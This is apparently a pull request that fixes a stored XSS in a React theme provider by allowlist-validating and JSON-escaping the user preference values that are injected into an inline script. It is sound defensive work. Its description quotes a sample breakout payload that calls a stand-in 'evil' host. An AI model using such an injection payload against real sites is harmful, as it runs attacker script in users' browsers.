### PR TITLE
fix: validate theme preference before inline-script injection (stored XSS)

### DIFF
--- a/core/ui/gluestack-ui-provider/index.web.tsx
+++ b/core/ui/gluestack-ui-provider/index.web.tsx
@@ -1,6 +1,7 @@
 'use client'
 import { OverlayProvider } from '@gluestack-ui/core/overlay/creator'
 import { ToastProvider } from '@gluestack-ui/core/toast/creator'
+import { COLOR_THEMES, DEFAULT_COLOR_THEME } from '@tinycld/core/lib/color-themes'
 import React, { useEffect, useLayoutEffect } from 'react'
 import { Uniwind } from 'uniwind'
 import { script } from './script'
@@ -8,6 +9,18 @@ import { script } from './script'
 export type ModeType = 'light' | 'dark' | 'system'
 
 const useSafeLayoutEffect = typeof window !== 'undefined' ? useLayoutEffect : useEffect
+
+const MODES: ReadonlySet<ModeType> = new Set<ModeType>(['light', 'dark', 'system'])
+const COLOR_THEME_SLUGS: ReadonlySet<string> = new Set(COLOR_THEMES.map(t => t.slug))
+
+// The theme-init script is injected raw into an inline <script> before first
+// paint, and mode/colorTheme originate from user_preferences via unvalidated
+// `as` casts. Validate both against their allowlists so a crafted value can't
+// break out of the injected string literal (stored self-XSS).
+const safeMode = (mode: string): ModeType =>
+    MODES.has(mode as ModeType) ? (mode as ModeType) : 'dark'
+const safeColorTheme = (colorTheme?: string): string =>
+    colorTheme && COLOR_THEME_SLUGS.has(colorTheme) ? colorTheme : DEFAULT_COLOR_THEME
 
 export function GluestackUIProvider({
     mode = 'dark',
@@ -18,35 +31,38 @@ export function GluestackUIProvider({
     colorTheme?: string
     children?: React.ReactNode
 }) {
+    const validMode = safeMode(mode)
+    const validColorTheme = safeColorTheme(colorTheme)
+
     const handleMediaQuery = React.useCallback(
         (e: MediaQueryListEvent) => {
             const resolvedMode = e.matches ? 'dark' : 'light'
-            script(resolvedMode, colorTheme)
+            script(resolvedMode, validColorTheme)
             Uniwind.setTheme(resolvedMode)
         },
-        [colorTheme]
+        [validColorTheme]
     )
 
     useSafeLayoutEffect(() => {
-        if (mode === 'system') return
-        script(mode, colorTheme)
-        Uniwind.setTheme(mode)
-    }, [mode, colorTheme])
+        if (validMode === 'system') return
+        script(validMode, validColorTheme)
+        Uniwind.setTheme(validMode)
+    }, [validMode, validColorTheme])
 
     useSafeLayoutEffect(() => {
-        if (mode !== 'system') return
+        if (validMode !== 'system') return
         const media = window.matchMedia('(prefers-color-scheme: dark)')
         media.addListener(handleMediaQuery)
         return () => media.removeListener(handleMediaQuery)
-    }, [handleMediaQuery, mode])
+    }, [handleMediaQuery, validMode])
 
     return (
         <>
             <script
                 suppressHydrationWarning
-                // biome-ignore lint/security/noDangerouslySetInnerHtml: static, self-authored theme-init script (serialized local function + bounded mode/colorTheme values, no user input) that must run before first paint to prevent a theme flash
+                // biome-ignore lint/security/noDangerouslySetInnerHtml: static, self-authored theme-init script (serialized local function) that must run before first paint to prevent a theme flash; mode/colorTheme are allowlist-validated and JSON.stringify-escaped, so no user input reaches the markup
                 dangerouslySetInnerHTML={{
-                    __html: `(${script.toString()})('${mode}','${colorTheme ?? ''}')`,
+                    __html: `(${script.toString()})(${JSON.stringify(validMode)},${JSON.stringify(validColorTheme)})`,
                 }}
             />
             <OverlayProvider>


### PR DESCRIPTION
## Problem
`GluestackUIProvider` (web) serialized `mode`/`colorTheme` raw into an inline `<script>` via `dangerouslySetInnerHTML`. Both values come from `user_preferences` through unvalidated `as` casts, so a crafted stored value like `');fetch('//evil')//` would break out of the string literal and execute on every page load (stored self-XSS).

## Fix
Allowlist-validate both values before use:
- `mode` against `{light, dark, system}` (falls back to `dark`)
- `colorTheme` against `COLOR_THEMES` slugs (falls back to `DEFAULT_COLOR_THEME`)

The injected args are also `JSON.stringify`-escaped so they can't break out of the literal even if the allowlist ever widened. The runtime `script(...)` calls now use the validated values too. Behavior is identical for valid inputs.